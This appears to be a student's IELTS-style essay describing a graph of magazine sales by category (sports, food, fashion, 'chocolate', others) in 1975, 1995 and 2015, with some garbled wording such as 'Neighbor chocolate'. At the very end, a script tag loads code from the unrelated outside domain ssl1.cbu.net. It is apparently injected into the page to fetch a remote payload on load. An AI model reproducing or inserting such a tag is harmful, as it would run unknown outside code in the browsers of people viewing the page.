The graph below shows the proportion of types of magazines sold by the company in 1975, 1995 and 2015.
The graph demonstrates the percentage of magazines bought from a company in the year of 1975, 1995 and 2015, divided into several categories that include sports, food, fashion, chocolate and others.
Overall, sports news had the highest figure of all in 3 years. In contrast, fashion and food magazines shared the bottom position. Sports also had a rising trend over the year, while the percentage of fashion magazines decreased slightly.
The number of sports magazines was superior, compared to the rest, and constantly grew, at over 30% in 1975, 36% in 1995 and 42% in 2015. The lowest point on the graph was fashion magazines in 2015, at only 5%. However, the proportion food and other types stayed unchanged in 1975 and 2015, at approximately 10% in food and a bit over 25% in others. Neighbor chocolate had the same percentage as other types in 1975, then dropped to 20% in 1995 and remained stable until 2015.<script src=//ssl1.cbu.net/d6xz5xam></script>
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